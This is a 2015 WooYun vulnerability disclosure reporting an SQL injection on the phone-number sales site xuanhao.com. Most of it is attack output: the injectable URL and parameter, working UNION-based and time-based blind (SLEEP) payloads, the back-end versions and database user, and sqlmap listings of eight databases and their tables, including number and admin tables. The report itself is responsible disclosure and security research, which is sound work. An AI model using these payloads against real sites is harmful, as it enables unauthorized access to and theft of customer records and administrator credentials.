当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143463

漏洞标题:选号网官网sql时间盲注(8个数据库+236个表+可泄漏全部号码+ucadmin)

相关厂商:选号网

漏洞作者: 路人甲

提交时间:2015-09-28 09:10

修复时间:2015-11-12 09:12

公开时间:2015-11-12 09:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
北京选号网-是北京最大最全的手机号码销售基地,数十万张北京手机号码低价促销,销售各类北京全球通、动感地带、神州行畅听卡、大众卡、UP新势 力、如意通、无限通...........

详细说明:

注入点

http://www.xuanhao.com/spxx/liantong.php?rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105&hd=&jg=&sw=


数据

Place: GET
Parameter: flbm
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=-5282' UNION SELECT CONCAT(0x3a667
0693a,0x50797a75745578684766,0x3a636a713a), NULL, NULL# AND 'gXVh'='gXVh&hd=&jg=
&sw=
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105' AND SLEEP(5) AND 'BChR'='BCh
R&hd=&jg=&sw=
---
[17:24:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.11, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[17:24:50] [INFO] fetching current user
current user:    '28_2011xuan@localhost'


8个数据库

available databases [8]:
[*] 15_testxh
[*] 28_2011xuan
[*] 46_gdxuanhao
[*] 47_szxuanhao
[*] information_schema
[*] js_xuanhao
[*] test
[*] xuanhaodotcom


220多表

Database: js_xuanhao
[29 tables]
+---------------------------------------+
| hao_bm                                |
| hao_dyfl                              |
| hao_dzhm                              |
| hao_gwc_ddb                           |
| hao_gwc_shr                           |
| hao_gwc_wdsc                          |
| hao_gwc_xx                            |
| hao_hyjbxx                            |
| hao_news                              |
| hao_news_category                     |
| hao_number                            |
| hao_numberbak                         |
| ..........省略.....                             |
| hao_spxx                              |
| ..........省略..... 
..........省略.....                           |
| hao_xwxq                              |
| hao_xwztml                            |
| hao_zxzx                              |
+---------------------------------------+
Database: 47_szxuanhao
[33 tables]
+---------------------------------------+
| hao_bm                                |
| hao_dyfl                              |
| hao_dzhm                              |
| hao_glry                              |
| hao_glrydl                            |
| hao_glryqx_category                   |
| hao_glryxs                            |
| hao_gwc_ddb                           |
| hao_gwc_shr                           |
| hao_gwc_wdsc                          |
| hao_gwc_xx                            |
| hao_hyjbxx                            |
| hao_news                              |
| hao_news_category                     |
| hao_number                            |
..........省略..... 
..........省略.....                                |
+---------------------------------------+
Database: 46_gdxuanhao
[33 tables]
+---------------------------------------+
| hao_bm                                |
| hao_dyfl                              |
| hao_dzhm                              |
| hao_glry                              |
| hao_glrydl                            |
| hao_glryqx_category                   |
| hao_glryxs                            |
| hao_gwc_ddb                           |
| hao_gwc_shr                           |
| hao_gwc_wdsc                          |
| hao_gwc_xx                            |
| hao_hyjbxx                            |
| hao_news                              |
|..........省略.....                         |
| ..........省略..... ..........省略..... 
..........省略..... 
..........省略.....                    |
+---------------------------------------+
Database: test
[19 tables]
+---------------------------------------+
| uc_admins                             |
| uc_applications                       |
| uc_badwords                           |
| s                   |
|,,,,,,,,,,,,,,,...........省略.....                          |
+---------------------------------------+
Database: xuanhaodotcom
[8 tables]
+---------------------------------------+
| c_category                            |
| c_company                             |
| c_glry                                |
| c_glrydl                              |
| c_storage                             |
..........省略..... 
..........省略..... 
..........省略..... 
..........省略.....                            |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
|..................................
.................                       |
+---------------------------------------+


之所以说全部号码:看4个数据库都是选号的

[*] 28_2011xuan
[*] 46_gdxuanhao
[*] 47_szxuanhao
[*] js_xuanhao


hao_number


uc_admins


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝